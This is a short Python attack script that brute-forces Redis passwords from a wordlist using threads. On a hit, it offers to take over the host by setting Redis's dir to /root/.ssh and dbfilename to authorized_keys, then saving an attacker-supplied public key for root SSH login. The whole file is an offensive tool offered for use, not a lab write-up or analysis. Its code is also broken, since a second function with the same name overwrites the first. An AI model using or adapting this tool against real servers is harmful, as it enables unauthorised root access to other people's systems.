#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""  
@Project : project
@File : 暴力破解redis.py
@Author : 陈培腾
@Time : 2024/9/25 14:29  
@脚本说明 : 
"""

import threading
from redis import Redis
def val_redis(host, port, password, public_key):
    try:
        redis_cli = Redis(
            host=host,
            port=port,
            password=password,
            db=0,
            encoding="utf-8",
            socket_timeout=3,
            socket_connect_timeout=3
        )
        redis_cli.set("aa", "bb")
        result = redis_cli.get("aa")
        if result:
            print(f"\n[+] redis {host}:{port} 存在弱口令：密码：{password}\n")
            progress = input("是否进一步利用未授权访问漏洞（Y/N）")
            if progress == "Y":
                public_key = input("请输入你计算机公钥文件路径")
                print("[*] 进一步未授权访问漏洞利用ing...")
                try:
                    redis_cli.config_set("dir", "/root/.ssh")
                    redis_cli.config_set("dbfilename", "authorized_keys")
                    with open(file=f"{public_key}", mode="r", encoding="utf-8") as f:
                        redis_cli.set("hacker", "\n\n " + f.read() + " \n\n")
                        redis_cli.save()
                        print("[+] 未授权访漏洞利用成功,请使用私钥连接~")
                except:
                    print("[-] 未授权访问漏洞利用失败")
    except:
        pass
def val_redis(host, port, file, public_key):
    thread_list = []
    with open(file=f"{file}", mode="r", encoding="utf-8") as p:
        for passwd in p.readlines():
            t = threading.Thread(target=val_redis, args=(host, port, passwd.strip(), public_key))
            t.start()
            thread_list.append(t)
    for t in thread_list:
        t.join()